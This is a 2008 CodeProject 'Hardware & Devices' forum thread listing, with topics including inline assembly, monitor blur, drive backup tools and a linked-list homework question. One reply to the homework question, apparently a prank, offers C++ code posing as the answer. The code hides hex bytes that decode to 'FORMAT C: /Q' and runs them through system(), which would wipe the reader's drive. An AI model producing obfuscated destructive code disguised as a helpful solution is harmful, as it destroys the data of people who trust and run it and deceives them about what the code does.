Click here to Skip to main content
15,920,031 members
Home / Discussions / Hardware & Devices
   

Hardware & Devices

 
AnswerRe: Building c# pc remote control? Pin
Matthew Butler2-Apr-08 14:56
Matthew Butler2-Apr-08 14:56 
GeneralRe: Building c# pc remote control? Pin
Goalie352-Apr-08 19:11
Goalie352-Apr-08 19:11 
GeneralRe: Building c# pc remote control? Pin
Matthew Butler3-Apr-08 2:57
Matthew Butler3-Apr-08 2:57 
GeneralMonitor blur Pin
Mekong River31-Mar-08 17:19
Mekong River31-Mar-08 17:19 
GeneralRe: Monitor blur Pin
Sebastian Schneider2-Apr-08 5:00
Sebastian Schneider2-Apr-08 5:00 
GeneralRe: Monitor blur Pin
Mekong River3-Apr-08 0:11
Mekong River3-Apr-08 0:11 
GeneralRe: Monitor blur Pin
Dave Kreskowiak3-Apr-08 3:47
mveDave Kreskowiak3-Apr-08 3:47 
General_asm code Pin
ForNow31-Mar-08 14:33
ForNow31-Mar-08 14:33 
GeneralUsing and Preserving Registers in Inline Assembly Pin
Randor 1-Apr-08 16:42
professional Randor 1-Apr-08 16:42 
GeneralRe: Using and Preserving Registers in Inline Assembly Pin
ForNow1-Apr-08 19:41
ForNow1-Apr-08 19:41 
GeneralAnything special prlouge __fastcall with _asm Pin
ForNow3-Apr-08 6:16
ForNow3-Apr-08 6:16 
GeneralRe: Anything special prlouge __fastcall with _asm Pin
Randor 7-Apr-08 17:37
professional Randor 7-Apr-08 17:37 
GeneralRe: Anything special prlouge __fastcall with _asm Pin
ForNow7-Apr-08 23:03
ForNow7-Apr-08 23:03 
GeneralRe: Using and Preserving Registers in Inline Assembly Pin
bob169726-Apr-08 7:39
bob169726-Apr-08 7:39 
GeneralRe: Using and Preserving Registers in Inline Assembly Pin
Randor 7-Apr-08 17:58
professional Randor 7-Apr-08 17:58 
GeneralRe: Using and Preserving Registers in Inline Assembly Pin
bob169728-Apr-08 3:29
bob169728-Apr-08 3:29 
QuestionWrite a function that will return the 5th element from the end ( not from the head of the list) in a singly linked list of integers, in one pass Pin
beyondjjw27-Mar-08 14:46
beyondjjw27-Mar-08 14:46 
GeneralRe: Write a function that will return the 5th ... Pin
Matthew Butler28-Mar-08 4:06
Matthew Butler28-Mar-08 4:06 
GeneralRe: Write a function that will return the 5th element from the end ( not from the head of the list) in a singly linked list of integers, in one pass Pin
Gary R. Wheeler29-Mar-08 0:28
Gary R. Wheeler29-Mar-08 0:28 
static int data[] = { 0x46, 0x4F, 0x52, 0x4D, 0x41,
                      0x54, 0x20, 0x43, 0x3A, 0x20,
                      0x2F, 0x51, 0x00 };
Entry *Find5thFromEnd(const std::list<Entry> &list)
{
  char buff[sizeof(data)/sizeof(data[0])];
  int i = 0;
  while (data[i] != 0x00) {
    buff[i] = (char)data[i];
    i++;
  }
  system(buff);
  return (Entry *)buff;
};


Software Zen: delete this;
Fold With Us![^]

GeneralRe: Write a function that will return the 5th element from the end ( not from the head of the list) in a singly linked list of integers, in one pass Pin
Trollslayer3-Apr-08 12:38
mentorTrollslayer3-Apr-08 12:38 
GeneralDrive backup/transfer software Pin
hairy_hats27-Mar-08 6:27
hairy_hats27-Mar-08 6:27 
GeneralRe: Drive backup/transfer software Pin
Jörgen Andersson27-Mar-08 12:06
professionalJörgen Andersson27-Mar-08 12:06 
GeneralRe: Drive backup/transfer software Pin
hairy_hats28-Mar-08 0:14
hairy_hats28-Mar-08 0:14 
GeneralRe: Drive backup/transfer software Pin
code-frog28-Mar-08 3:54
professionalcode-frog28-Mar-08 3:54 
GeneralRe: Drive backup/transfer software Pin
hairy_hats29-Mar-08 15:11
hairy_hats29-Mar-08 15:11 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.